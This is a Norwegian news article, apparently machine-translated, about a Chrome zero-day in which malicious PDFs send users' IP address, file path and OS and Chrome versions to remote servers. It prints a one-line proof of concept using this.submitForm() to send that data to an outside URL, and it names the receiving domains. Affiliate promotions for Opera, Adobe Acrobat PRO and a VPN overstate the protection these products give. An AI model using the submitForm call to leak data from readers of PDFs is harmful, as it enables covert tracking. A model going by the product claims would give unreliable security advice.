Utnyttelsesdeteksjonstjenesten EdgeSpot oppdaget et spennende null-dagers sårbarhet i Chrome som utnytter PDF-dokumenter.
Sårbarheten gjør det mulig for angripere å høste sensitive data ved hjelp av ondsinnede PDF-dokumenter som er åpnet i Chrome.
Så snart offeret åpner de respektive PDF-filene i Google Chrome, begynner et ondsinnet program å jobbe i bakgrunnen ved å samle inn brukerdata.
Dataene blir deretter videresendt til den eksterne serveren som blir kontrollert av hackerne. Du lurer kanskje på hvilke data som blir sugd av angriperne, de målretter mot følgende data på din PC:
- IP adresse
- Hele banen til PDF-filen på systemet
- OS- og Chrome-versjoner
Vær oppmerksom på skadelige PDF-filer
Eksperter oppdaget at det ene av de to domenene readnotify [.] com eller burpcollaborator [.] nett mottok dataene.
De avslørte at angriperne bruker this.submitForm () PDF Javascript API for å samle sensitiv informasjon fra brukerne.
Vi testet det med en minimal PoC, en enkel API-samtale som this.submitForm ('http://google.com/test') vil få Google Chrome til å sende personopplysningene til google.com.
Denne Chrome-feilen ble utnyttet av to forskjellige sett med ondsinnede PDF-filer, begge sirkulerte i henholdsvis oktober 2017 og september 2018.
Spesielt kan de innsamlede dataene brukes av angriperne til å finjustere angrep i fremtiden. Rapporter antyder at den første batchen av filer ble samlet ved hjelp av ReadNotifys PDF-sporingstjeneste.
Brukere kan bruke tjenesten for å holde oversikt over brukervisninger. EdgeSpot har ikke delt noen detaljer angående arten til det andre settet med PDF-filer.
Hurtigtips: Bytt nettleser til Opera
I disse urolige tider blir vi angrepet med skadelig programvare, phishing og trojanere i hvert trinn, så vi må være mye mer årvåkne og være beskyttet.
Og da dette er et spesifikt problem for Chrome, kan du unngå den trusselen og alle andre med en sikkerhetsorientert nettleser som Opera.
Denne nettleseren kommer med en innebygd annonseblokkering som ikke bare fjerner slike distraksjoner, men også blokkerer analyseskript, sporingspiksler og metoder for å samle inn dataene dine.
Og hvis du vil være helt sikker på at du holder deg unna enhver fare, kan du komme deg bak den innebygde VPN-tjenesten som er 100% gratis å bruke i ubegrenset tid.
Opera
Opera tilbyr den perfekte trusselsbeskyttelsen med den innebygde annonseblokkeringen og VPN-tjenesten gratis! Få det gratis Besøk nettsidenHvordan kan jeg være beskyttet mot PDF-sårbarheter?
Last ned Adobe Acrobat PRO
Adobe og Chrome passer godt sammen når det gjelder håndtering av PDF-filer. Ved å installere Adobe Extension for Chrome, kan du se gjennom og manipulere PDF-filer etter eget ønske uten å forlate favorittleseren din.
Til tross for sin robuste struktur, kan det hende at skadelig programvare skjult i PDF-filer ikke blir oppdaget hvis du bruker standardversjonen av Reader.
Den profesjonelle versjonen anbefales for å garantere beskyttelsen din og holde dataene dine borte fra hackere.
Selv om det ikke er gratis, er prisen du vil betale ganske liten for mengden ekstra funksjoner du vil ha, inkludert forbedret sikkerhet for PDF-filene dine.
Det er også en gratis prøveperiode på 7 dager inkludert, slik at du kan få en smak av hele Pro-opplevelsen før du kjøper.
Adobe Acrobat PRO
Hold deg unna skadelig programvare ved å laste ned Adobe Acrobat PRO. Den har mange flere funksjoner enn den gratis versjonen og holder dataene dine trygge. Gratis prøveperiode Besøk nettstedet Les merI tilfelle du vil være sikker mens du surfer på internett, må du skaffe deg et fullt dedikert verktøy for å sikre nettverket ditt. Installer privat internettilgang nå og sikre deg selv. Den beskytter PCen din mot angrep mens du surfer, maskerer IP-adressen din og blokkerer all uønsket tilgang.
Utnyttelsesgjenkjenningstjenesten EdgeSpot ønsket å varsle Chrome-brukerne om potensielle risikoer fordi oppdateringen ikke var forventet å bli utgitt i nær fremtid..
EdgeSpot rapporterte til Google om sårbarheten i fjor, og selskapet lovet å gi ut en oppdatering i slutten av april.
Du kan imidlertid vurdere å bruke en midlertidig løsning på problemet ved å se mottatte PDF-dokumenter lokalt ved hjelp av en annen leser-app.
Alternativt kan du også åpne PDF-dokumentene dine i Chrome ved å koble systemene dine fra Internett.
FAQ: Lær mer om Chrome-utvidelser
- Fungerer Privacy Badger med Chrome?
Ja det gjør det. Men hvis du vil ha et bredere utvalg, kan du utforske de beste valgene våre for Chrome-personvernutvidelser i denne komplette veiledningen.
- Kan du redigere PDF-filer i Chrome?
Det er mange utvidelser som tillater behandling av PDF-filer. Ta en titt på vår utmerkede guide om de beste PDF-utvidelsene for Chrome.
- Har Google en QR-kodegenerator?
Det gjør det ikke, men du kan aktivere det raskt. Her er vår omfattende guide om hvordan du aktiverer QR-kodegeneratoren i Chrome.
Redaktørens merknad: Dette innlegget ble opprinnelig publisert i april 2020 og har siden blitt oppdatert og oppdatert i august 2020 for friskhet, nøyaktighet og omfattende.
- Cybersikkerhet